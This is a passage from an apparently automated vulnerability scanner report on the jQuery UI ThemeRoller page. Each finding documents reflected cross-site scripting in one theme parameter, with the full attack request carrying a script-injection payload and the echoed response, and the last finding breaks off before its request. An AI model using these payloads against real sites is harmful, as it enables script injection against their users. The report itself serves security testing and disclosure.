GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100e233d"><script>alert(1)</script>dfa3cab4bb9&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100e233d"><script>alert(1)</script>dfa3cab4bb9&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColor
...[SNIP]...

3.146. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f79f"><script>alert(1)</script>2687cae33c8 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=1004f79f"><script>alert(1)</script>2687cae33c8&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
extureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=1004f79f"><script>alert(1)</script>2687cae33c8&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorD
...[SNIP]...

3.147. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd3b"><script>alert(1)</script>ad29cf7f0db was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85bdd3b"><script>alert(1)</script>ad29cf7f0db&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
xtureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85bdd3b"><script>alert(1)</script>ad29cf7f0db&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc
...[SNIP]...

3.148. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11622"><script>alert(1)</script>2a8698a89ee was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=9511622"><script>alert(1)</script>2a8698a89ee&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
c88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=9511622"><script>alert(1)</script>2a8698a89ee&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

3.149. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 803b0"><script>alert(1)</script>c470df28bbc was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55803b0"><script>alert(1)</script>c470df28bbc&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
eTheme.css.php?ctl=themeroller&ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55803b0"><script>alert(1)</script>c470df28bbc&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorCon
...[SNIP]...

3.150. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c93d9"><script>alert(1)</script>d8f0585ac03 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55c93d9"><script>alert(1)</script>d8f0585ac03&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55c93d9"><script>alert(1)</script>d8f0585ac03&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a
...[SNIP]...

3.151. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2f63"><script>alert(1)</script>a1fb44a8ffa was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75a2f63"><script>alert(1)</script>a1fb44a8ffa&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75a2f63"><script>alert(1)</script>a1fb44a8ffa&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd
...[SNIP]...

3.152. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f060"><script>alert(1)</script>f4d625fbe8f was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=05f060"><script>alert(1)</script>f4d625fbe8f&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:10:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=05f060"><script>alert(1)</script>f4d625fbe8f&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

3.153. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7ccc"><script>alert(1)</script>1d5996565c3 was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0f7ccc"><script>alert(1)</script>1d5996565c3&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:10:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0f7ccc"><script>alert(1)</script>1d5996565c3&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.154. http://jqueryui.com/themeroller/ [bgTextureActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 420d7"><script>alert(1)</script>43bc00d2166 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

